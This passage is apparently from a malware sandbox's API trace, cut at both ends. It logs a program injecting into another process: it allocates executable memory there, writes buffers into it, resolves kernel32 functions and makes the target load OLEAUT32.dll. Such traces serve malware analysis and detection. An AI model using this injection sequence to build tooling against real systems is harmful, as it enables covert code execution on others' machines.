0x7ffb26250b80 [0190.042] lstrlenA (lpString="CoInitializeEx") returned 14 [0190.043] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0190.043] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32adb042*, nSize=0xf, lpNumberOfBytesWritten=0xcdac8 | out: lpBuffer=0x32adb042*, lpNumberOfBytesWritten=0xcdac8*=0xf) returned 1 [0190.043] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0190.043] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf5a0 [0190.043] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0190.043] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x1e0000, lpBuffer=0x32acf5a0*, nSize=0x20, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0x32acf5a0*, lpNumberOfBytesWritten=0xcd9d8*=0x20) returned 1 [0190.044] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesWritten=0xcd9d8*=0xd8) returned 1 [0190.044] ResetEvent (hEvent=0x640) returned 1 [0190.044] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0190.046] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0190.046] VirtualFreeEx (hProcess=0x730, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.046] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf5a0 | out: hHeap=0x2150000) returned 1 [0190.046] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.046] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0190.046] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0190.047] lstrlenA (lpString="CoUninitialize") returned 14 [0190.047] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0190.047] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32adb018*, nSize=0xf, lpNumberOfBytesWritten=0xcdac8 | out: lpBuffer=0x32adb018*, lpNumberOfBytesWritten=0xcdac8*=0xf) returned 1 [0190.047] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0190.047] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acfa50 [0190.047] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0190.048] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x1e0000, lpBuffer=0x32acfa50*, nSize=0x20, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0x32acfa50*, lpNumberOfBytesWritten=0xcd9d8*=0x20) returned 1 [0190.048] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesWritten=0xcd9d8*=0xd8) returned 1 [0190.048] ResetEvent (hEvent=0x640) returned 1 [0190.048] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0190.049] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0190.049] VirtualFreeEx (hProcess=0x730, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.049] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acfa50 | out: hHeap=0x2150000) returned 1 [0190.049] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.049] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0190.049] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0190.049] lstrlenA (lpString="CoInitializeSecurity") returned 20 [0190.049] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x15, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0190.050] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32adb02a*, nSize=0x15, lpNumberOfBytesWritten=0xcdac8 | out: lpBuffer=0x32adb02a*, lpNumberOfBytesWritten=0xcdac8*=0x15) returned 1 [0190.050] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0190.050] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf3c0 [0190.050] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0190.050] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x1e0000, lpBuffer=0x32acf3c0*, nSize=0x20, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0x32acf3c0*, lpNumberOfBytesWritten=0xcd9d8*=0x20) returned 1 [0190.051] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesWritten=0xcd9d8*=0xd8) returned 1 [0190.051] ResetEvent (hEvent=0x640) returned 1 [0190.051] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0190.051] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0190.052] VirtualFreeEx (hProcess=0x730, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.052] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf3c0 | out: hHeap=0x2150000) returned 1 [0190.052] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.052] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0190.052] GetProcAddress (hModule=0x7ffb26230000, lpProcName="LoadLibraryW") returned 0x7ffb262550f0 [0190.052] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32adb094, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0190.052] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acfa50 [0190.052] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32adb094, cbMultiByte=-1, lpWideCharStr=0x32acfa50, cchWideChar=13 | out: lpWideCharStr="OLEAUT32.dll") returned 13 [0190.052] lstrlenW (lpString="OLEAUT32.dll") returned 12 [0190.052] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0190.053] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32acfa50*, nSize=0x1a, lpNumberOfBytesWritten=0xcdad8 | out: lpBuffer=0x32acfa50*, lpNumberOfBytesWritten=0xcdad8*=0x1a) returned 1 [0190.053] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda30, nSize=0xd8, lpNumberOfBytesRead=0xcd9e8 | out: lpBuffer=0xcda30*, lpNumberOfBytesRead=0xcd9e8*=0xd8) returned 1 [0190.053] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf3c0 [0190.053] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0190.053] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x1e0000, lpBuffer=0x32acf3c0*, nSize=0x18, lpNumberOfBytesWritten=0xcd9e8 | out: lpBuffer=0x32acf3c0*, lpNumberOfBytesWritten=0xcd9e8*=0x18) returned 1 [0190.054] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda30*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9e8 | out: lpBuffer=0xcda30*, lpNumberOfBytesWritten=0xcd9e8*=0xd8) returned 1 [0190.058] ResetEvent (hEvent=0x640) returned 1 [0190.058] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0190.061] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda30, nSize=0xd8, lpNumberOfBytesRead=0xcd9e8 | out: lpBuffer=0xcda30*, lpNumberOfBytesRead=0xcd9e8*=0xd8) returned 1 [0190.061] VirtualFreeEx (hProcess=0x730, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.061] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf3c0 | out: hHeap=0x2150000) returned 1 [0190.061] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.062] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acfa50 | out: hHeap=0x2150000) returned 1 [0190.062] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0190.062] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0190.062] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0190.062] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf840 [0190.062] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0190.062] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32acf840*, nSize=0x20, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0x32acf840*, lpNumberOfBytesWritten=0xcd9d8*=0x20) returned 1 [0190.063] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesWritten=0xcd9d8*=0xd8) returned 1 [0190.063] ResetEvent (hEvent=0x640) returned 1 [0190.063] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0190.063] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0190.063] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.064] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf840 | out: hHeap=0x2150000) returned 1 [0190.064] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0190.064] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0190.064] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0190.064] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf3c0 [0190.064] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0190.064] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32acf3c0*, nSize=0x20, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0x32acf3c0*, lpNumberOfBytesWritten=0xcd9d8*=0x20) returned 1 [0190.065] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesWritten=0xcd9d8*=0xd8) returned 1 [0190.065] ResetEvent (hEvent=0x640) returned 1 [0190.065] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0190.065] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0190.066] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.066] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf3c0 | out: hHeap=0x2150000) returned 1 [0190.066] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0190.066] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0190.066] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0190.066] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf3c0 [0190.066] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0190.066] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32acf3c0*, nSize=0x20, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0x32acf3c0*, lpNumberOfBytesWritten=0xcd9d8*=0x20) returned 1 [0190.067] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesWritten=0xcd9d8*=0xd8) returned 1 [0190.067] ResetEvent (hEvent=0x640) returned 1 [0190.067] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0190.068] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0190.068] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.068] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf3c0 | out: hHeap=0x2150000) returned 1 [0190.068] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0190.068] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0190.068] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0190.068] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf840 [0190.068] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0190.069] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32acf840*, nSize=0x20, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0x32acf840*, lpNumberOfBytesWritten=0xcd9d8*=0x20) returned 1 [0190.069] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesWritten=0xcd9d8*=0xd8) returned 1 [0190.069] ResetEvent (hEvent=0x640) returned 1 [0190.069] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0190.070] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0190.070] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.070] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf840 | out: hHeap=0x2150000) returned 1 [0190.072] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0190.072] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0190.072] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0190.072] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf840 [0190.073] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0190.073] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32acf840*, nSize=0x20, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0x32acf840*, lpNumberOfBytesWritten=0xcd9d8*=0x20) returned 1 [0190.073] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesWritten=0xcd9d8*=0xd8) returned 1 [0190.074] ResetEvent (hEvent=0x640) returned 1 [0190.074] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0190.075] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0190.075] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.075] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf840 | out: hHeap=0x2150000) returned 1 [0190.075] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0190.075] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0190.075] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0190.075] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf3c0 [0190.075] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0190.076] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32acf3c0*, nSize=0x20, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0x32acf3c0*, lpNumberOfBytesWritten=0xcd9d8*=0x20) returned 1 [0190.076] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesWritten=0xcd9d8*=0xd8) returned 1 [0190.076] ResetEvent (hEvent=0x640) returned 1 [0190.076] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0190.077] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0190.077] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.077] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf3c0 | out: hHeap=0x2150000) returned 1 [0190.077] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0190.077] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0190.077] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0190.077] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acfa50 [0190.077] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0190.077] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32acfa50*, nSize=0x20, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0x32acfa50*, lpNumberOfBytesWritten=0xcd9d8*=0x20) returned 1 [0190.078] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesWritten=0xcd9d8*=0xd8) returned 1 [0190.078] ResetEvent (hEvent=0x640) returned 1 [0190.078] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0190.079] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0190.079] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.079] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acfa50 | out: hHeap=0x2150000) returned 1 [0190.079] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0190.080] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0190.080] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0190.080] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf3c0 [0190.080] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0190.080] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32acf3c0*, nSize=0x20, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0x32acf3c0*, lpNumberOfBytesWritten=0xcd9d8*=0x20) returned 1 [0190.080] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesWritten=0xcd9d8*=0xd8) returned 1 [0190.081] ResetEvent (hEvent=0x640) returned 1 [0190.081] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0190.081] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0190.081] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.081] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf3c0 | out: hHeap=0x2150000) returned 1 [0190.081] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0190.082] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0190.082] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0190.082] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf3f0 [0190.082] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0190.082] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32acf3f0*, nSize=0x20, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0x32acf3f0*, lpNumberOfBytesWritten=0xcd9d8*=0x20) returned 1 [0190.082] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesWritten=0xcd9d8*=0xd8) returned 1 [0190.083] ResetEvent (hEvent=0x640) returned 1 [0190.083] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0190.083] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0190.083] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.083] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf3f0 | out: hHeap=0x2150000) returned 1 [0190.083] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0190.084] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0190.084] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0190.084] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf3c0 [0190.084] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0190.084] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32acf3c0*, nSize=0x20, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0x32acf3c0*, 